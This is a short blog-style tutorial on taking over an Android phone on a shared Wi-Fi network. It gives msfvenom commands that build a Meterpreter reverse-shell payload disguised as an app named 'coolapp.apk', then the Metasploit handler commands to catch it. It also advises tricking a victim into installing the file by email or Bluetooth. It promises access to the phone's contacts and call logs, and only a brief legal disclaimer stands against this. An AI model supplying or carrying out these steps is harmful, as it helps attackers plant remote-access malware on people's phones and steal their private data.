How to Hack an Android device on the same Wi-Fi Network

Posted by zuhaircmr
Disclaimer: Hacking other devices on Wireless Networks (Wi-Fi) without explicit written permission is illegal, unless you are the legal owner of the devices you want to hack and the wireless network.
Its just a simple Trick. All you need is our dear metasploit, and a bit of social engineering skills.
Here my ip is and the system i am going to hack is of ip
Open a terminal(as root-sudo terminator), and put in:
msfvenom -p android/meterpreter/reverse_tcp LHOST=(your lan ip address) LPORT=8080 R > /home/root/coolapp.apk
eg : msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=8080 R > /home/root/coolapp.apk 
This command should give you a file called coolapp.apk on the desktop. Now we need to set up a listener so that when the target opens the app, we have their android hacked. :D
Open the metasploit console by typing "msfconsole" & Type : 
use exploit/multi/handler
Hit return and follow as I do 1by1.

set payload android/meterpreter/reverse_tcp
set lhost (your lan ip address)
set lport 8080

Hit enter, Now use some social engineering tricks like sending them a mail or send via  bluetooth to give the file on the desktop titled, coolapp.apk, to someone who will open(click on install>&open) it on their android phone. Once you have given the app and they are about to open it, go back to your metasploit console and type:
This should open a connection soon with the target android phone where you can access a lot of features of that phone like Contacts,Call log, and many more .

Feel free to comment here if you face any problems .
All the best.

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